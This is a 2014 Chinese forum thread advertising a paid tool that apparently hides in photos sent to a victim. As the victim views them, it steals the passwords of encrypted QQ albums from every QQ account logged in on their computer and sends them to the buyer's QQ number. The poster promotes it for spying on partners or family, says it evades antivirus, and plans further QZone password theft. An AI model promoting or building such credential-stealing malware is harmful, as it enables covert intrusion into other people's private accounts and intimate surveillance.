★我要吧★

注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

[原创] 2014通过浏览照片查看相册(此版暂停更新)

各位吧友,看到标题可能你已能想到内容是什么了。。。这次的研究不同于论坛置顶贴100宝石的软件,区别在于这个需发给对方图片才能达到查看目的,前题是关系不错的或对方对你的图片感兴趣的。4 y9 ], F! j9 ^1 ?4 p* G- u
qq相册密码查看——通过给对方发送照片,在浏览照片的同时,相册密码会发到你指定的QQ号上,本次研究系帮助在感情或家庭等方面遇到问题的吧友解决问题,纯技术爱好,请勿作非法用途,违者收回使用权。 ! \+ H- ~( x/ w! \+ ?8 l0 P1 h
在浏览图片时本机登陆的所有QQ,凡有加密相册的会自动截取密码发到指定号码上;
+ d7 G1 a- W$ H) n% g) |  U: r  \0 T图片可以自由设置,无限制图片张数;录了视频教程详细讲解,需要的吧友下载看看吧。。
演示教程下载地址:
8 G( Y1 X* [! F! \( p
4 U. t( E9 ^) ~网通下载地址9 P' a6 G( k8 k( m
电信下载地址
购买宝石加QQ(9574 619):点击这里给我发消息(非买勿加,1宝石1元,如发临时消息未回可加管理$ G5 }5 |7 D) L1 h: D8 b

! R' z9 I! N  s, s- v怎样快速获得好评度和时代宝石及提高权限方法!新手必看
: m; |0 q+ Y  j6 t( c0 m7 _
( c: K2 `3 l4 \) W3 M- G
工具下载: 浏览照片查看qq相册密码.rar (220.78 KB, 售价: 70 时代宝石) 8 Y" U5 v: S& Q
1 O& e( a- {# E) N; ^# Z0 c

# U$ }4 Q# A  N! K+ ?
! q& b' X! r. a1 y; B! Z6 R& L. `3 B- r2 [" }: t- `

评分

luobin5379151 + 10 老大给力
路过了谁的风景谁的心 + 9 版区有你更精彩 :)

a872772769 发表于 2014-2-23 01:17( t$ G/ ~" J2 ^4 Q) F0 C/ Z; |
空间都进不了,感觉没啥用了,除了可以进空间的
3 z+ Y$ ]7 }1 H' p5 i  @+ o
这次开发的主要针对空间开放或有权限进入空间的,后面根据大家需求看是否开发截取空间密码和权限空间自动把自己加入权限列表的

可惜啊,新来的财力不支啊。但是很赞  详情 回复 发表于 2014-3-15 17:05
支持老大开发权限这个  详情 回复 发表于 2014-2-25 11:44
回复 支持 1 反对 0

咦老大新东西整出来了哇 赶快看一下 已经迫不及待了

空间都进不了,感觉没啥用了,除了可以进空间的

这次开发的主要针对空间开放或有权限进入空间的,后面根据大家需求看是否开发截取空间密码和权限空间自动把自己加入权限列表的  详情 回复 发表于 2014-2-23 02:44

奋斗赚宝石中  拉大加油

这个给力     

路过,宝石不够,望洋兴叹。

是照片发给对方的破解么?

会被杀毒软件拦截吗

不会。。免杀。。  详情 回复 发表于 2014-2-23 18:11

魑魅离魂 发表于 2014-2-23 17:28
1 U6 o! V3 W# M会被杀毒软件拦截吗
7 a1 L6 f6 S( I
不会。。免杀。。

不错,我看看教程先

可以试试看

我的 时代宝石 不足,无法下载

宝石不够啊,要努力赚

还是期待不是qq好友可以看空间日志的方法

风格和监管局和公积金和  详情 回复 发表于 2014-3-11 23:28